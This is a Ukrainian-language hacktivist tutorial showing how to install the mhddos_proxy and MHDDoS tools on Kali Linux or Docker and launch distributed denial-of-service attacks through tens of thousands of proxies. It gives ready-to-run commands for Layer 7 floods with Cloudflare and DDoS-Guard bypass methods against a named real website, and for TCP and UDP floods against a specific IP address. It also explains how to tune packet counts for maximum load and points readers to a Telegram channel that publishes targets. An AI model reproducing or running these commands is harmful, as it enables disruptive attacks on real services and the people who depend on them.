Слава Україні!

Доброго вечора, ми з України!

MHDDoS_Proxy (kali, docker)

Estimated reading: 2 minutes 1263 views

Привіт, кіберслов’яни!

Що ви отримуєте, використовуючи цей скрипт:

  • Перелік провайдерів з набором проксі-серверів у кількості близько 35 000 інстансів (на момент написання статті).
  • Можна атакувати відразу кілька цілей (скрипт сам розподілить навантаження)
  • Менше помилок та багів
  • Зрозуміліший синтаксис при написанні команд атаки

Встановлюємо на Kali Linux

Запускаємо нашу віртуальну Kali Linux (ЯКУ МИ НАЛАШТУВАЛИ В ЦЬОМУ ГАЙДІ) та відкриваємо Terminal. Насамперед підвищимо наші привілеї до root-користувача

  • sudo su #Переходимо до root-користувача, пароль за замовчуванням «kali»
  • rm -rf MHDDoS #(Якщо в вас був просто MHDDos)Видаляємо директорію разом з усіма файлами MHDDoS

Далі клонуємо наш прокачений скрипт із гітхабу наступною командою:

  • git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git

Тепер переходимо в директорію нашого скрипту та підвантажуємо головну тулзу для атак MHDDoS наступним чином:

  • cd mhddos_proxy #Переходимо в директорію щойно завантаженого скрипту
  • git clone https://github.com/MHProDev/MHDDoS.git #Клонуємо MHDDoS

Далі нам потрібно підвантажити файл requirements.txt, але для початку встановити python3-pip. Зробити це можна такими невигадливими командами:

  • apt update #Збираємо всі пакети, доступні для оновлення
  • apt install python3-pip #Встановлюємо потрібний нам пакет

Коли запитують “так чи ні”, ми вибираємо “так”, вводячи “Y”

Чекаємо завершення установки та переходимо до фінального кроку «тюнінгу» MHDDoS. Встановлюємо requirements.txt наступною командою:

  • python3 -m pip install -r MHDDoS/requirements.txt

Готово! Тепер у нас на руках прокачений MHDDoS, як ним тепер користуватися?

Атака на Layer 7 (Рівень додатків)

Атаку на цьому рівні можна провести успішно, якщо ви знаєте, який засіб “захисту” використовується і для даного засобу є метод атаки в самому MHDDoS (Наприклад, cfb для Cloudflare, dgb для DDoS-Guard, і т.д.)

Шаблон команди (VPN не вимагається):

  • python3 runner.py <Ціль> --http-methods <Метод> -t <Запити> --rpc <Підключення> -p <Оновлення> --debug

Де:

  • Ціль – це посилання у форматі https://example.com
  • Метод (–http-methods) – Один з методів MHDDoS (CFB, DGB, BYPASS, GET і т.д
  • Запити(-t) – Кількість “зловмисних” запитів/пакетів на ціль.
  • Підключення(–rpc) – Кількість запитів, що надсилаються на 1 проксі-сервер, після чого проксі-сервер транслює ці запити на ціль.
  • Оновлення(-p) – Період часу в секундах, через який ваше з’єднання з проксі-серверами оновлюватиметься (проксі-сервери мають властивості падати, скидати з’єднання тощо). За промовчанням 300 секунд.
  • –debug – Потрібний для того, щоб ми бачили лог атаки.

Фінальна команда на ціль https://grozny.tv/ виглядатиме так:

  • python3 runner.py https://grozny.tv/ --http-methods dgb -t 1000 --rpc 100 -p 300 --debug

Після запуску потрібно якийсь час почекати (близько 1-2 хвилин), поки встановиться з’єднання з проксі-серверами.

Атака на Layer 4 (Транспортний рівень, p2p)

Атака на цьому рівні може бути успішною, якщо у вас на руках є сервери мети, що атакуються, які знаходяться за “захистом”. У такому разі ви атакуєте сервер безпосередньо за ip-адресою. По синтаксису тут все так само, як і на Layer 7 тільки ціль потрібно вказувати в іншому форматі:

Для атаки TCP Flood (VPN не вимагається):

Вказуємо цілі у форматі tcp://IP:port, а ключі –http-methods вказуємо TCP, приклад команди:

  • python3 runner.py tcp://87.226.162.181:80 -t 1000 -p 300 --rpc 50 --http-methods TCP --debug

Для атаки UDP Flood (VPN обов’язковий):

Вказуємо цілі у форматі udp://IP:port, а у ключі –http-methods вказуємо UDP, приклад команди:

  • python3 runner.py udp://87.226.162.181:80 -t 1000 -p 300 --rpc 50 --http-methods UDP --debug

Docker

Якщо у вас встановлено docker, можна запускати атаку через mhddos_proxy, використовуючи docker. Синтаксис практично нічим не відрізняється, хіба що перед кожною “дефолтною” командою потрібно додати docker run -it –rm portholeascend/mhddos_proxy, виглядатиме ця буде приблизно таким чином:

Layer 7:

  • docker run -it --rm portholeascend/mhddos_proxy https://grozny.tv/ –http-methods dgb -t 1000 –rpc 100 -p 300 –debug

Layer 4(TCP):

  • docker run -it --rm portholeascend/mhddos_proxy tcp://87.226.162.181:80 -t 1000 -p 300 –rpc 50 –http-methods TCP –debug

Layer 4(UDP):

  • docker run -it --rm portholeascend/mhddos_proxy udp://87.226.162.181:80 -t 1000 -p 300 –rpc 50 –http-methods UDP –debug

Як встановити Docker на Вашу ОС:

  • Windows: https://docs.docker.com/desktop/windows/install/
  • Mac: https://docs.docker.com/desktop/mac/install/
  • Ubuntu: https://docs.docker.com/engine/install/ubuntu/
  • Kali Linux: https://www.kali.org/docs/containers/installing-docker-on-kali/

Завантажити останній образ mhddos_proxy можна наступною командою:

  • docker pull portholeascend/mhddos_proxy:latest

Оптимізація введення значень

Приклад команди:

  • python3 runner.py <Ціль> --http-methods <Метод> -t <Пакети> --rpc <Підключення> -p <Оновлення> --debug

Що можна додатково зробити:

  • Ціль – Цілі при проведенні атаки на одному рівні і з використанням одного методу атаки, зазначеного в –http-methods, можна перераховувати через пробіл. У цьому випадку кількість загроз будуть розділені на кожну мету рівномірно від тієї кількості, яку ви вказали.
  • Метод – З усіма методами можна ознайомитись  на самому гітхабі (розділ Features And Methods). Усі цілі, які ми готуємо в нашому каналі – ми готуємо вже з необхідними для атаки методами). На одному рівні атаки методи також можна перераховувати через пробіл.
  • Пакети– це кількість “шкідливих” пакетів/запитів, що відправляються на ціль. Тут можна викручувати по максимуму на стільки, на скільки тягне ваш ПК (моніторіть навантаження в диспетчері завдань, дивимося на ЦПУ та ОЗУ, у Kali Linux це зелений та синій графік відповідно). Будьте уважні, на початку атаки навантаження може бути мінімальним, а через деякий час зашкалювати. Враховуйте, що зі збільшенням пакетів/загроз, кількість проксі серверів може знизитися. За замовчуванням 1000, за бажанням – скільки влізе у вашу машину.
  • Підключення– Тут вказуємо передбачувану кількість підключень одного проксі-серверу. Оптимально вказувати від 50 до 100. Припустимо, що у Вас 1000 проксі-серверів, при вказівці підключень у кількості 50, Ви відправите 50 000 пакетів на вашу мету (в ідеалі, але певний відсоток пакетів швидше за все може загубитися). Не рекомендуємо викручувати значення, це навантажить проксі-сервера, пам’ятайте, що ними користуєтеся не тільки ви і вони не гумові).
  • Період атаки – Значення вказується в секундах, за замовчуванням це 300 секунд і це означає, що кожні 300 секунд ви оновлюватимете список проксі-серверів і перепідключатиметеся до них (деякі проксі могли забанити або з’єднання з ними може бути втрачено). Скрипт перезапускається автоматично, рекомендує вказувати тут не більше 10 хвилин, тому що чим частіше оновлюватимуться проксі, в розумних межах, тим краще.

Процес атаки:

  • PPS – кількість встановлених з’єднань із метою атаки.
  • BPS – вага цих пакетів у байтах, кілобайтах, мегабайтах. Оптимально коли BPS видайте показники не менше 500кБ, залежно від сайту, вашого інтернет-з’єднання та потужності Вашої машини іноді вичавлюється до 30 Мб, але це все суб’єктивно.
  • % – це просто хід вашої атаки, це час до оновлення проксі-серверів та перезапуску атаки у відсотках. Відсотки нічого спільного з ефективністю атаки не мають.

Готово! Тепер у Ваших руках нарізна кібер-рушниця 🙂

Підготував Український Жнець

  • Наш Telegram-канал #Тут публікуємо цілі, готуємо для Вас команди для атаки та викладаємо нові гайди
  • Наш Telegram-чат #Вам тут допоможуть включити компуктер і стати українським жнецом, якого бояться всі російські веб-сервіси.

Удачі, панове та Слава Україні

Share this Doc

MHDDoS_Proxy (kali, docker)

Or copy link